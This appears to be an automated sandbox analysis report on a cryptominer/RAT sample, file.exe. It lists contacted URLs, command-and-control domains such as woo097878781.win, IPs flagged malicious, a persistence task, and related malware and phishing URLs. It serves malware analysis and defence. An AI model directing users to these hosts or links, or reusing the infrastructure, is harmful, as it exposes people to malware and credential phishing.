https://www.google.com/async/hpba?yv=3&cs=0&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/dg%3D0/br%3D1/rs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:/xjs/_/ss/k%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/br%3D1/rs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O/ck%3Dxjs.hd.Br47UfLWS7U.L.B1.O/am%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog,_fmt:prog,_id:_QVhbZ6XKF6u3i-gP-ZzZoAs_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBY..i	false		high
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&rt=wsrt.6165,cbt.201,hst.82&opi=89978449&dt=&ts=300	false		high
https://www.google.com/async/hpba?vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQj-0KCBc..i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449&yv=3&sp_imghp=false&sp_hpte=1&sp_hpep=1&stick=&cs=0&async=_basejs:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fam%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fdg%3D0%2Fbr%3D1%2Frs%3DACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw,_basecss:%2Fxjs%2F_%2Fss%2Fk%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA%2Fbr%3D1%2Frs%3DACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A,_basecomb:%2Fxjs%2F_%2Fjs%2Fk%3Dxjs.hd.en_US.8fCINjS4xE8.es5.O%2Fck%3Dxjs.hd.Br47UfLWS7U.L.B1.O%2Fam%3DCEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB%2Fd%3D1%2Fed%3D1%2Fdg%3D0%2Fbr%3D1%2Fujg%3D1%2Frs%3DACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog,_fmt:prog,_id:_QVhbZ6XKF6u3i-gP-ZzZoAs_9	false		high
https://play.google.com/log?format=json&hasfast=true&authuser=0	false		high
https://woo097878781.win/66/api/endpoint.php	true	Avira URL Cloud: safe	unknown
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=lOO0Vd,sy8i,P6sQOc?xjs=s4	false		high
https://www.google.com/client_204?cs=1&opi=89978449	false		high
https://www.google.com/favicon.ico	false		high
https://play.google.com/log?hasfast=true&authuser=0&format=json	false		high
https://play.google.com/log?format=json&hasfast=true	false		high
https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif	false		high
https://www.google.com/gen_204?atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&s=promo&rt=hpbas.10228&zx=1734039627405&opi=89978449	false		high
https://www.google.com/xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=0/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=sylx,sypx?xjs=s4	false		high
https://www.google.com/images/searchbox/desktop_searchbox_sprites318_hr.webp	false		high
https://www.google.com/gen_204?s=async&astyp=hpba&atyp=csi&ei=R1hbZ9m8AcmJ7NYPytGlUA&rt=ipf.0,ipfr.2828,ttfb.2828,st.2829,acrt.2830,ipfrl.2830,aaft.2830,art.2830,ns.-8926&ns=1734039611012&twt=1.3999999999941792&mwt=1.3999999999941792	false		high
https://www.google.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ogs.google.com/	chromecache_158.12.dr	false		high
http://www.broofa.com	chromecache_125.12.dr, chromecache_115.12.dr, chromecache_113.12.dr	false		high
https://github.com/mgravell/protobuf-netJ	file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.google.com/intl/en/about/products	chromecache_122.12.dr	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/log?format=json&hasfast=true	chromecache_125.12.dr, chromecache_115.12.dr, chromecache_141.12.dr, chromecache_118.12.dr	false		high
https://lens.google.com	chromecache_125.12.dr, chromecache_115.12.dr	false		high
https://g.live.com/odclientsettings/ProdV2.C:	svchost.exe, 0000000B.00000003.2171096230.00000267946F0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.11.dr	false		high
https://ogs.google.com/widget/callout	chromecache_158.12.dr	false		high
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chromecache_148.12.dr, chromecache_160.12.dr	false		high
http://schema.org/WebPage	chromecache_122.12.dr	false		high
https://woo097878781.win	explorer.exe, 00000008.00000003.2194188224.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lens.google.com/gen204	chromecache_150.12.dr, chromecache_130.12.dr	false		high
https://support.google.com/	chromecache_131.12.dr, chromecache_126.12.dr	false		high
https://www.google.com	chromecache_158.12.dr, chromecache_113.12.dr	false		high
https://www.google.com/url?q	chromecache_158.12.dr	false		high
https://github.com/mgravell/protobuf-neti	file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://csp.withgoogle.com/csp/lcreport/	chromecache_125.12.dr, chromecache_115.12.dr	false		high
https://www.google.	chromecache_125.12.dr, chromecache_115.12.dr	false		high
https://stackoverflow.com/q/11564914/23354;	file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://woo097878781.win/P.txtC:	explorer.exe, 00000008.00000003.2804259244.0000000003218000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chromecache_122.12.dr	false		high
https://apis.google.com	chromecache_148.12.dr, chromecache_160.12.dr, chromecache_122.12.dr, chromecache_113.12.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2124724518.0000018D9F671000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F79A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://domains.google.com/suggest/flow	chromecache_148.12.dr, chromecache_160.12.dr	false		high
https://woo097878781.win/66/api8	explorer.exe, 00000008.00000003.2804154799.0000000003208000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/tools/feedback	chromecache_131.12.dr, chromecache_126.12.dr	false		high
https://lensfrontend-pa.clients6.google.com/v1/crupload	chromecache_115.12.dr	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/app/so?eom=1	chromecache_122.12.dr	false		high
https://support.google.com/websearch/answer/106230	chromecache_125.12.dr, chromecache_115.12.dr	false		high
https://stackoverflow.com/q/14436606/23354	file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com/js/api.js	chromecache_141.12.dr, chromecache_118.12.dr	false		high
https://www.google.com/_/og/promos/	chromecache_122.12.dr	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2156917001.0000018DAF6E3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://woo097878781.win/66/api	explorer.exe, 00000008.00000003.2804154799.0000000003208000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2194188224.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	false		high
https://plus.google.com	chromecache_160.12.dr	false		high
https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=	chromecache_125.12.dr, chromecache_115.12.dr, chromecache_141.12.dr, chromecache_118.12.dr	false		high
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 0000000B.00000003.2171096230.0000026794763000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.11.dr	false		high
https://ogs.google.com/widget/callout?prid=19037050	chromecache_122.12.dr	false		high
https://lensfrontend-pa.clients6.google.com/v1/gsessionid	chromecache_125.12.dr, chromecache_115.12.dr	false		high
https://push.clients6.google.com/upload/	chromecache_131.12.dr, chromecache_126.12.dr	false		high
https://woo097878781.win/P.txtZ	explorer.exe, 00000008.00000003.2804371385.0000000003208000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/2152978/23354	file.exe, 00000000.00000002.2656930945.000001FBA6830000.00000004.08000000.00040000.00000000.sdmp	false		high
https://www.google.com"	chromecache_158.12.dr	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2124724518.0000018D9F898000.00000004.00000800.00020000.00000000.sdmp	false		high
https://xmrig.com/docs/algorithms	cvtres.exe, 00000007.00000003.2149800904.00000171D47D0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://woo097878781.win/66/api/endpoint.php39	explorer.exe, 00000008.00000003.2804259244.0000000003228000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2124724518.0000018D9F671000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google.com	file.exe, 00000000.00000002.2156184931.000001FB8E176000.00000004.00000800.00020000.00000000.sdmp, WindosCPUsystem.exe, 00000009.00000002.3638469569.0000020A5F69C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://woo097878781.win/P.txtl	explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://clients6.google.com	chromecache_148.12.dr, chromecache_160.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.238	play.google.com	United States	15169	GOOGLEUS	false
172.217.17.78	plus.l.google.com	United States	15169	GOOGLEUS	false
154.216.20.243	woo097878781.win	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
37.203.243.102	unknown	Russian Federation	44964	DAPLDATAPLANETLtdRU	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.157.162.216	unknown	Sweden	197595	OBE-EUROPEObenetworkEuropeSE	true

Private

IP
192.168.2.5
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574100
Start date and time:	2024-12-12 22:39:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.evad.mine.winEXE@34/102@24/9
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.217.21.35, 172.217.19.206, 64.233.164.84, 142.250.181.142, 199.232.214.172, 23.218.208.109, 192.229.221.95, 172.217.17.46, 172.217.17.67, 172.217.17.42, 142.250.181.10, 142.250.181.74, 172.217.17.74, 172.217.19.234, 142.250.181.42, 172.217.19.10, 142.250.181.106, 142.250.181.138, 172.217.19.202, 172.217.21.42, 172.217.19.170, 216.58.208.234, 142.250.181.99, 142.250.181.67, 172.217.17.35, 34.104.35.123, 142.250.181.46, 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): clients1.google.com, ssl.gstatic.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, crl3.digicert.com, clients.l.google.com, www.gstatic.com, prod.fs.microsoft.com.akadns.net
Execution Graph export aborted for target cvtres.exe, PID 1120 because it is empty
Execution Graph export aborted for target cvtres.exe, PID 7216 because it is empty
Execution Graph export aborted for target file.exe, PID 984 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5644 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:40:04	API Interceptor	28x Sleep call for process: powershell.exe modified
16:40:09	API Interceptor	2x Sleep call for process: cvtres.exe modified
16:40:11	API Interceptor	2x Sleep call for process: svchost.exe modified
22:40:10	Task Scheduler	Run new task: WindosCPUsystem.exe path: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
37.203.243.102	file.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
	lokigod.exe	Get hash	malicious	Xmrig	Browse
	xblkpfZ8Y4.exe	Get hash	malicious	Xmrig	Browse
239.255.255.250	https://sunjoy.us/FrontEnd/Order/ClientOrder?r=OjOPs86UyCAES$Kc7fW4b3J0sABVed2S0tnrWO6voz0UM4TOsax7EiA	Get hash	malicious	Unknown	Browse
	https://welsfargo.com-onlinebanking.com/XTFlySnlzYzQ1UXhqajFTVmtsYW50WkJBemRTamR4ME9mMGtnVWViL3dEU3g5cFRIUkFHOWdJQkxybzhJL1ZUSmJ4cExVZnk0UjVRcnFEc21wK2tXeGYyeG42TzJjREZmN05JQkhyZHViMldUakRRM3REKzU5ZS9HektFNXF4bEx3bXR2dzBnSytmRzIyOG4xU3NyNFc5RVlOY0h5Q2xMTFlLRVhEWnUwTVVQb2o2cUU3QURVMUhjbnJ3ST0tLU50cDlIc1hXNURmNmFNV0ctLXdjQnpKeTJDTUVxeHg3KzJKWVVIOVE9PQ==?cid=2324924114	Get hash	malicious	KnowBe4	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	original.eml	Get hash	malicious	Unknown	Browse
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse
	https://usps.com-blkr.top/us/	Get hash	malicious	Unknown	Browse
	http://ebaumsworld.com	Get hash	malicious	Unknown	Browse
	https://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse
	https://morgans-proposal-site.webflow.io/	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse
185.157.162.216	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
154.216.20.243	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	SJqOoILabX.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Credential Flusher, DarkVision Rat, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse
	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse
	https://zillow-online.com/realestate/one/drive/docs/	Get hash	malicious	HTMLPhisher	Browse
	https://estacionar-replonline.net/galicia/?fbclid=PAZXh0bgNhZW0BMAABpj	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pool.hashvault.pro	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	5.188.137.200
	file.exe	Get hash	malicious	Xmrig	Browse	37.203.243.102
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	37.203.243.102
	file.exe	Get hash	malicious	Amadey, DCRat, DarkVision Rat, LummaC Stealer, Stealc, Vidar	Browse	37.203.243.102
	file.exe	Get hash	malicious	DarkVision Rat, Xmrig	Browse	5.188.137.200
	lokigod.exe	Get hash	malicious	Xmrig	Browse	37.203.243.102
	xblkpfZ8Y4.exe	Get hash	malicious	Xmrig	Browse	5.188.137.200
	0kToM9fVGQ.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	prog.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
	bypass.exe	Get hash	malicious	Xmrig	Browse	95.179.241.203
www3.l.google.com	https://cargalia.com/o/?c3Y9bzM2NV8xX29uZSZyYW5kPWVFczJZems9JnVpZD1VU0VSMjkxMTIwMjRVNDYxMTI5NTU=N0123N	Get hash	malicious	Unknown	Browse	142.250.181.142
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	172.217.19.238
	https://analytics-prd.aws.wehaa.net/trackings?value=1&action=click&category=external&origin=detailpage&url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&cat=firstpage&label_item_id=9633&label_owner_id=646&label_url=http://notifix.info/scales/ec49f59be146f69f3ea00c211d5cccd90524b2cf7f8aec665534fc020c910734b9e18d0945bd518a0e55b407c5bf7443cf6179/paige_williams@newyorker.com&idle=8d15bf95831b32126e4b3bd02a20cf592eade0e3442422aeaf0db14b2e91ae186a5549c468519863594ece59910ee541&tenant=minnesotastate.jobs	Get hash	malicious	Captcha Phish	Browse	172.217.19.238
	Final Demand to Harbor Wholesale Grocery Inc.pdf	Get hash	malicious	Unknown	Browse	172.217.19.238
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.com	Get hash	malicious	HTMLPhisher	Browse	172.217.19.238
	https://t.ly/me-ZS	Get hash	malicious	Unknown	Browse	172.217.17.46
	https://hdtodayz.to/movie/watch-the-shawshank-redemption-hd-19679	Get hash	malicious	HTMLPhisher	Browse	172.217.19.238
	http://balmyrind.com/	Get hash	malicious	Unknown	Browse	172.217.19.206
	https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.uk	Get hash	malicious	HTMLPhisher	Browse	172.217.19.238
	Publishing.htm	Get hash	malicious	Unknown	Browse	142.250.181.142
google.com	file.exe	Get hash	malicious	Credential Flusher	Browse	216.58.208.238
	file.exe	Get hash	malicious	Credential Flusher	Browse	172.217.19.238
	https://sunjoy.us/FrontEnd/Order/ClientOrder?r=OjOPs86UyCAES$Kc7fW4b3J0sABVed2S0tnrWO6voz0UM4TOsax7EiA	Get hash	malicious	Unknown	Browse	142.250.181.132
	download.ps1	Get hash	malicious	Unknown	Browse	74.125.21.105
	download.ps1	Get hash	malicious	Unknown	Browse	142.250.181.132
	https://welsfargo.com-onlinebanking.com/XTFlySnlzYzQ1UXhqajFTVmtsYW50WkJBemRTamR4ME9mMGtnVWViL3dEU3g5cFRIUkFHOWdJQkxybzhJL1ZUSmJ4cExVZnk0UjVRcnFEc21wK2tXeGYyeG42TzJjREZmN05JQkhyZHViMldUakRRM3REKzU5ZS9HektFNXF4bEx3bXR2dzBnSytmRzIyOG4xU3NyNFc5RVlOY0h5Q2xMTFlLRVhEWnUwTVVQb2o2cUU3QURVMUhjbnJ3ST0tLU50cDlIc1hXNURmNmFNV0ctLXdjQnpKeTJDTUVxeHg3KzJKWVVIOVE9PQ==?cid=2324924114	Get hash	malicious	KnowBe4	Browse	142.250.181.132
	download.ps1	Get hash	malicious	Unknown	Browse	74.125.21.105
	file.exe	Get hash	malicious	Credential Flusher	Browse	142.250.181.110

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SKHT-ASShenzhenKatherineHengTechnologyInformationCo	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	154.216.20.243
	file.exe	Get hash	malicious	Xmrig	Browse	154.216.20.243
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	45.207.239.54
	Strait STS.vbs	Get hash	malicious	Remcos, GuLoader	Browse	154.216.18.216
	mips.elf	Get hash	malicious	Mirai	Browse	156.226.9.180
